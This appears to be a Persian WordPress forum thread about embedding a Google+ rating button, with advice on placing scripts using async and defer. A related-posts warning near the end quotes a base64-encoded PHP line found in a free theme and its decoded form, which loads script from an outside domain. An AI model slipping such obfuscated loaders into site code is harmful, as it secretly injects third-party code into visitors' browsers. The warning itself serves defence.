• اطلاعیه ها

    • Saeed Fard

      پوشش زنده وردکمپ ۲۰۱۸ اروپا توسط وردپرس پارسی   23/03/97

      اگر کاربر وردپرس هستید حتما تا به حال اسم وردکمپ رو شنیدید، کمپ و دورهمی بزرگ توسعه‌دهنده‌ها و کاربران وردپرس که سالانه در کشورهای مختلف برگزار میشه تحت عنوان وردکمپ هستش که از سمت مراجع اصلی وردپرس حمایت و برگزار می‌شه.   این‌ بار در سال 2018 وردکمپ اروپا در شهر بلگراد کشور صربستان در حال برگزاری هستش، این رویداد طی سه روز 24 تا 26 تیر ماه (June 14-16) برگزار میشه، در این رویداد مصطفی صوفی از وردپرس پارسی و به نمایندگی تمامی کاربران وردپرس فارسی حضور داره. وردپرس پارسی رویداد وردکمپ 2018 اروپا رو به صورت زنده توسط مصطفی پوشش می‌ده و در صورت علاقه‌مندی به این مراسم می‌تونید از طریق وردپرس پارسی دنبالش کنید.در حال حاضر یک روز از این مراسم گذشته که گزارش اون در قسمت پوشش زنده قرار گرفته. برای دنبال کردن مراسم وردکمپ اروپا به صورت لحظه‌ای به صفحه پوشش زنده در قسمت زیر مراجعه کنید. همینطور در آینده منتظر خبر برگزاری اولین وردکمپ در ایران توسط وردپرس‌پارسی باشید. https://wp-parsi.com/wceu-2018

      لینک خبر در وردپرس پارسی : https://wp-parsi.com/wceu-2018-live  
S A J J A D

کد گوگل پلاس پی سی دانلود

9 پست در این موضوع قرار دارد

سلام دوستان

کد گوگل پلاسی که سایت پی سی دانلود استفاده میکنه رو کسی داره ؟ البته منظورم اون کدی هستش که نوشته به این صفحه و به این سایت امتیاز بدین رو میخوام

نمونه : http://p30download.com/fa/entry/49853

0

به اشتراک گذاری این پست


لینک به پست

خداییش تو عمرم هیچی مثل آموزش قرار دادن دکمه گوگل + ندیدم توی سایت های آموزش وردپرس و مشابه ، خداییش اگر یه کلمه بنویسی دکمه گوگل + هزار تا مطلب میاد اما ما بازم شمارو دوست داریم :D یه دونه مال سایت خودمو میزارم ، برای تغییر رنگ و شکل میتونید استایل هارو تغییر بدید


<div style="border: 1px solid rgb(0, 174, 255); color: rgb(0, 0, 0); line-height: 20px; padding: 5px;border-radius:8px;-webkit-border-radius:8px; text-shadow: -1px 1px 0px rgb(241, 247, 249); font-size: 8pt; position: fixed; bottom: 15px; background-color: rgb(255, 255, 255); background-repeat: repeat; font-family: tahoma; text-align: center; left: 15px;" dir="rtl">
به آهنگباز امتیاز بده<br>
<!-- Place this tag in your head or just before your close body tag. -->
<script type="text/javascript" src="https://apis.google.com/js/platform.js"></script>
<!-- Place this tag where you want the +1 button to render. -->
<div class="g-plusone" data-size="tall" data-href="http://ahangbaz.org"></div>
</div>

نمونه توی سایت

آهنگباز

موفق باشید

3

به اشتراک گذاری این پست


لینک به پست

سلام

میدونم این تاپیک مربوط به قبلا است اما یه درخواست داشتم

باید این کد رو در کجا قرار بدیم؟ با تشکر

0

به اشتراک گذاری این پست


لینک به پست

فرق نداره. Header.php بزار شما

1

به اشتراک گذاری این پست


لینک به پست

فرق نداره. Header.php بزار شما

ببخشید من کد نویسی اصلا نمیدونم

اما یه سوال داشتم ایا در صورت قرار گرفتن در Header گوگل پلاس در انتهای مطالب لود می شود چون بعضی وقتها گوگل پلاس دیر لود می شود!

تشکر

0

به اشتراک گذاری این پست


لینک به پست

نه عزیز. اگه می خوای انتهای مطالبت لود کنی ساده ترین راه افرزونه هست.

Hupso sharing نصب کن

Sent from my Lenovo S5000-H using Tapatalk

1

به اشتراک گذاری این پست


لینک به پست

نه عزیز. اگه می خوای انتهای مطالبت لود کنی ساده ترین راه افرزونه هست.

Hupso sharing نصب کن

Sent from my Lenovo S5000-H using Tapatalk

نه منظور من این بود که اگر کاربر وارد سایت شد ابتدا تصاویر / مطالب و هر انچه که در سایت است لود بشود در انتها کد گوگل پلاس گوشه فراخوانی بشه! چون بعضی موقع ها گوگل پلاس دیر لود می شود !

حالا اخرین قسمتی که هر در هر سایت لود می شود و امکان قرار دادن کد در ان وجود دارد چیست؟

تشکر

0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

گوگل پلاس میره زیر تصاویر اسلاید شو ها چیکار کنم بیاد محو نشه ؟

تشکر

به خاطر درک بهتر یک توضیج کلی در مورد اجرا و تجزیه یک وب سایت توسط مرورگر میدم.

وفتی شما یک وب سایت رو توسط مرورگر باز میکنید ، این مراحل اتفاق میفته:

1.دریافت صفحه html

2.شروع تجزیه صفحه html

3.مواجه تجزیه گر با تگ <script> که به یک فایل خارجی اشاره داره

4.درخواست فایل اسکریپت خارجی توسط مرورگر ، در همین جال بلاک شدن تجزیه گر و توقف تجزیه سایر اجزای html

5.بعد از یک مدت زمانی فایل اسکریپت دانلود شده و متعاقبا فایل اجرا شده

6.تچزیه گر به تجزیه ادامه فایل html می پردازه.

همونطور که دید مرحله 4 اساسا بارگذاری سایت شما تا زمانی که فایل ها دانلود بشه متوقف میشه و این از نظر تجربه کاربری بسیار بد هست.

راه حل قدیمی : این هست که فایل های جاوا اسکریپت تون رو اخر <body> بزارید ، اینجوری اول کل صفجه لود میشه بعد فایل های جاوا اسکریپت دانلود میشن.

یک مشکلی که این روش داره ، برای سایت های با فایل های اسکریپت بزرگ اینکه فایل جاوا اسکریپت در سریع ترین زمان ممکن لود بشه از نظر کارایی حیاتی هست.

دیدید که یک سری سایت ها یک بخش هایی اش به جاوا اسکریپت وابسته هست ، تا زمانی که فایل جاوا اسکریپت لود نشه درست عمل نمیکنه ، حالا فکر کن اون سایت صفحه اش محتوای زیادی داشته باشه تا بخواهد اون صفحه دانلود بشه و کاربر کفری میشه.

راه حل مدرن : الان مرورگر ها از یک ویژگی async و defer پشتیبانی میکنن ، اینها نحوه کارشون به این صورت هست که میان به تجزیه گر میگن ، زمانی که اون فایل های جاوا اسکریپت در حال دانلود هست ، می تونی بری ادامه html رو تجزیه کنی ، به عبارت دیگه تجزیه گر بلاک نمیشه ، به صورت موازی کارشو انجام میده.

نمونه async


<script type="text/javascript" src="your_script1.js" async></script>
<script type="text/javascript" src="your_script2.js" async></script>

تو این حالت اسکریپت ها به صورت نا به همگام اجرا میشن ، یعنی به محض اینکه دانلود شدن اجرا میشن بدون بلاک کردن مرورگر. تو این حالت این احتمال وجود داری اسکریت دومی زودتر از اولی اجرا بشه.

در حال حاضر 80 درصد مرورگر ها از این حالت پیشتبانی میکنن. http://caniuse.com/#search=async

نمونه defer


<script type="text/javascript" src="your_script1.js" defer></script>
<script type="text/javascript" src="your_script2.js" defer></script>

تو این حالت اسکریپت به ترتیب اجرا میشن و مرورگر بلاک نمیشه ، بر خلاف async این جالت زمانی کل داکیومنت لود شد ، اسکریپت ها اجرا میشن.

در حال حاضر 88 درصد مرورگر ها از این حالت پشتیبانی میکنن. http://caniuse.com/#search=defer

نتیجه گیری

بهترین مکتن برای قرار دادن اسکریپت تو صفحه ، بخش <head> به همرا استفاده از async یا defer هست .

خوبیش اینکه هنوز هم سایتتون برای اون 20 درصد مرورگرهایی گه از این ویژگی ها پشتیبانی نمیکنن به درستی لود میشه و در عین حال برای اون 80 درصد دیگه بهینه هست.

ببخشید من کد نویسی نمیدونم اگر بخوام این دو مورد رو به این گوگل پلاس اضافه کنم کدش چی میشه؟

تشکر

ویرایش شده در توسط amator
0

به اشتراک گذاری این پست


لینک به پست
در در 7/19/2015 at 12:04، amator گفته است :

گوگل پلاس میره زیر تصاویر اسلاید شو ها چیکار کنم بیاد محو نشه ؟

تشکر

ببخشید من کد نویسی نمیدونم اگر بخوام این دو مورد رو به این گوگل پلاس اضافه کنم کدش چی میشه؟

تشکر

 

دوستمون کامل راهنمایی کردن کار خاصی نداره شما باید async رو به تگ script فراخوانی فایل سورس API جاوا اسکریپت plusone.js اضافه کنید تا همزمان با لود قالب به صورت موازی با قالب لود بشه 

<script type="text/javascript" src="https://apis.google.com/js/plusone.js" async></script>

 

ولی این ویژگی فقط واسه سورس هایی کاربردی تره که روی قالب سایت هنگام لود شدن اثر میذاره میذارن ، و واسه بقیه فایل ها اصلا ضروری نیست و  برعکس پیشنهاد میشه برای باقی فایل ها از defer استفاده بشه که بعد از  لود کامل HTML فعال بشن .

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط mrhhasani
      سلام و درود
      من وب سایتم رو در لوکال اجرا کردم اما بنا به دلایلی مشکلاتی برای xampp پیش آمد ک دیگر هیچ جوره نمیتوانم وب سایت رو در لوکال باز و مشاهده کنم.
      حالا به این نیاز دارم ک متن ها و توضیحاتم رو که دربرگه اصلی وردپرس نوشته ام رو پیدا کنم و در جای دیگر استفاده کنم...
      خیلی محتاج جوابش هستم.
      ممنونم
    • توسط mansarifar
      توی پوسته jobmonster  که یک پوسته کاریابیه. رزومه کارجو ها رو فقط کسانی که شغل تعریف می کنند میتونن ببینن. میخواستم این دسترسی رو تغییر بدم . یعنی همه بتونن ببینن.کسی می تونه کمک کنه؟ ممنون میشم
    • توسط logomaster
      سلام دوستان
      سایت ما یک برگه داره که از یک برگه ی دیگه به اون ریدایرکت و نمایش داده میشه. چطوری میتونم کاری کنم که اگه کاربر لینک اون برگه رو به صورت دستی در نوار آدرس مرورگر وارد کرد ، وارد اون برگه نشه ؟ مثلا بره به یک صفحه ی خاص
    • توسط maryam300
      سلام آیا کدی هست که با درج آن در متن نوشته یا برگه، عنوان اون نوشته یا برگه در متنش بیافته. مثلا عنوان برگه "وردپرس" هست. در متن اون برگه نوشته بشه. " سلام <وردپرس> "
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....